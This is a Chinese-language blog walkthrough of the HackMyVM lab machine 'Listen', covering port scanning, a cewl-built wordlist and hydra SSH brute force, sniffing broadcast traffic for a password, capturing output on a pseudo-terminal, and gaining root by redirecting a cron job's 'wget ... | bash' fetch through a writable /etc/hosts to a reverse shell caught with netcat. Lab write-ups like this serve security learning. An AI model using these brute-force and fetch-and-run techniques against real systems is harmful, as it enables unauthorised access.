
[HMV] Listen

感谢 @RiJaba1 的帮助

Thanks to @RiJaba1 for his help

0x00 配置

攻击机 IP:

靶机 IP:

0x01 攻击

使用 Nmap 扫描目标靶机开放的端口

└─# nmap -p-
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp filtered ssh
80/tcp filtered http
MAC Address: 08:00:27:E3:5D:03 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.34 seconds

发现了 22 (SSH) 和 80 (HTTP) 端口,但都被过滤了?尝试一下直接 curl

<h1> Please Listen </h1>
When I ask you to listen to me
and you start giving me advice,
You have not done what I asked.

When I ask you to listen to me
and you begin to tell me why
I shouldnt feel that way,
you are trampling on my feelings.

When I ask you to listen to me
and you feel you have to do something
to solve my problem,
you have failed me,
strange as that may seem.

Listen! All I ask is that you listen.
Dont talk or do, just hear me…

And I can do for myself; I am not helpless.
Maybe discouraged and faltering,
but not helpless.

When you do something for me that I can and need to do for myself,
you contribute to my fear and

But when you accept as a simple fact
That I feel what I feel,
No matter how irrational,
Then I can stop trying to convince
You and get about this business
Of understanding whats behind
This irrational feeling.

And when thats clear, the answers are obvious and I dont need advice.
Irrational feelings make sense when
we understand whats behind them.

So please listen, and just hear me.
And if you want to talk, wait a minute
for your turn, and I will listen to you.

-Leo Buscaglia

Leo please, stop using your poems as password!

直接 curl 发现有返回,再次扫描端口发现端口又都打开了

└─# nmap -p-
Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for
Host is up (0.00073s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E3:5D:03 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds

可能 nmap 扫描的时候正好把端口弄开了?80 端口的页面最下面有一段

Leo please, stop using your poems as password!

里面是 shadow 文件中 leo 用户的字段,还有一段提示,不要把他的诗句当作密码了。猜测需要用页面上方的诗句生成字典来爆破 leo 用户的密码。先用 cewl 工具按照网页上的内容生成字典

└─# cewl -w words.txt -d 1 -m 5
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

我用 john 的时候有点莫名其妙的问题。恰好 22 端口已经打开,所以就不用 john 破解 shadow 了,直接用 hydra 破解 SSH 更方便

└─# hydra -l leo -P ./words.txt ssh:// -t 64 -V -f -I
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


[22][ssh] host:   login: leo   password: contribute
[STATUS] attack finished for (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished

成功得到了用户 leo 的用户名和密码,登录 SSH 看看

└─# ssh leo@                 
leo@'s password: 
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

leo@listen:~$ :)


leo@listen:~$ cat /etc/passwd | grep "/bin/bash"

除了现在的 leo 用户,还发现了 silence 和 listen 用户,最后就是 root 用户了。开始寻找提权的方法

leo@listen:~$ ls -al
total 48
drwxr-xr-x 2 leo  leo   4096 Mar 26 22:46 .
drwxr-xr-x 5 root root  4096 Oct 16  2020 ..
-rw------- 1 leo  leo     12 Oct 16  2020 .bash_history
-rw-r--r-- 1 leo  leo    220 Oct 16  2020 .bash_logout
-rw-r--r-- 1 leo  leo   3526 Oct 16  2020 .bashrc
-rwsrws--- 1 root leo  16872 Oct 16  2020 poem
-rw-r--r-- 1 leo  leo    807 Oct 16  2020 .profile

在 leo 的家目录下发现了一个具有 SUID 的 poem 程序,使用 Python 搭建 HTTP 服务后传到主机使用 IDA 反编译

int __cdecl main(int argc, const char **argv, const char **envp)
  char v4[108]; // [rsp+10h] [rbp-70h] BYREF
  int v5; // [rsp+7Ch] [rbp-4h]

  printf("Ask me:\n ");
  __isoc99_scanf("%s", v4);
  if ( v5 == 5880 )
  return 0;

发现这里可能有一个缓冲区溢出的漏洞,但是试了很多 Payload 都没有成功,使用 gdb 调试器查看后发现编译器对其施加了保护措施,所以我们无法制造缓冲区溢出。尝试使用 Wireshark 抓取靶机的流量


发现靶机在持续向外发送 UDP 广播包,其中包含了一个端口敲门的提示和 silence 用户的密码,让我们使用密码登录到 silence 用户

└─# ssh silence@
silence@'s password: 
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

silence@listen:~$ :)

下一步我们应该登录到 listen 用户,查看一下 silence 用户的家目录中的线索

silence@listen:~$ cat note.txt 
"listen" told me that if I listen, I will hear his password....

silence@listen:~$ cat listen.sh 
cat /home/listen/password.txt > /dev/pts/4

想到之前定时向外发送 UDP 广播包的行为,使用 pspy 扫描一下计划任务,我们发现了一些可疑的脚本,其中就包含 /home/silence/listen.sh


这意味着 /home/listen/password.txt 的内容将被持续重定向到 /dev/pts/4 这个虚拟终端,查看一下现在存在的虚拟终端

silence@listen:~$ ls -al /dev/pts
total 0
drwxr-xr-x  2 root    root      0 Apr  1 22:32 .
drwxr-xr-x 17 root    root   3180 Apr  1 22:32 ..
crw--w----  1 silence tty  136, 0 Apr  1 22:33 0
c---------  1 root    root   5, 2 Apr  1 22:32 ptmx

现在并没有 pts4 这个虚拟终端,但是我们可以通过创建垃圾 SSH 连接来创建 pts4 终端


在我们开启额外的几个 SSH 连接后,成功撞见了 pts4 终端,现在我们只需要等待计划任务执行,然后把 password.txt 输出到最后一个终端中

└─# ssh silence@
silence@'s password: 
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

silence@listen:~$ shhhhhh

等待一段时间后,pts 4 终端中已经出现了 password.txt 的内容,现在我们得到了 listen 用户的密码,再使用 SSH 以 listen 用户登录

└─# ssh listen@ 
listen@'s password: 
Linux listen 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

listen@listen:~$ :)

查看一下 listen 用户家目录中有用的东西,以及 user flag

listen@listen:~$ ls -al
total 40
drwxr-xr-x 3 listen listen 4096 Apr  1 21:55 .
drwxr-xr-x 5 root   root   4096 Oct 16  2020 ..
-rw------- 1 listen listen  295 Apr  1 22:31 .bash_history
-rw-r--r-- 1 listen listen  220 Oct 16  2020 .bash_logout
-rw-r--r-- 1 listen listen 3526 Oct 16  2020 .bashrc
-rw-r--r-- 1 root   root     46 Oct 16  2020 listentome.sh
drwxr-xr-x 3 listen listen 4096 Oct 16  2020 .local
-rw------- 1 listen listen    8 Oct 16  2020 password.txt
-rw-r--r-- 1 listen listen  807 Oct 16  2020 .profile
-rw------- 1 listen listen   15 Oct 16  2020 user.txt

listen@listen:~$ cat listentome.sh 
wget -O - -q http://listen/ihearyou.sh | bash

listen@listen:~$ cat user.txt 

在这里又发现了一个计划任务的脚本,listentome.sh 会持续获取 http://listen/ihearyou.sh 并以 root 身份执行其中的内容,ping 一下这个域名

listen@listen:~$ ping listen
PING listen ( 56(84) bytes of data.
64 bytes from listen ( icmp_seq=1 ttl=64 time=0.014 ms


我们发现 listen 被解析到了本地回环,这通常是在 hosts 中定义的,这意味着我们无法劫持 DNS 来修改 listen 域名指向的 IP,不过在查找我们可写入的文件的时候,我发现了 /etc/hosts 也是我们可写的文件

listen@listen:~$ find / -writable ! -path '/proc*' ! -path '/run*' ! -path '/sys*' ! -path '/dev*' -type f 2>/dev/null

我们在本地搭建一个 HTTP 服务器,然后将反向 Shell 脚本放在网站根目录,随后修改靶机的 hosts 文件,将 listen 指向我们自行搭建的 HTTP 服务器


在攻击机中开启监听,稍作等待后,我们接收到了反向 Shell 的连接

└─# nc -lvnp 5001
listening on [any] 5001 ...
connect to [] from (UNKNOWN) [] 35060
python3 -c 'import pty; pty.spawn("/bin/bash");'      

root@listen:~# :)

最后,我们获取 root flag

root@listen:~# cd 

root@listen:~# cat root.txt
cat root.txt

0x02 总结

这个靶机卡了很久,最开始根本没有想到可以用 Wireshark 抓靶机的流量,后来又被 poem、pts 卡了很久,在 @RiJaba1 的帮助下解出了这个靶机

posted @ 2023-04-02 10:59  20206675  阅读(148)  评论(0编辑  收藏  举报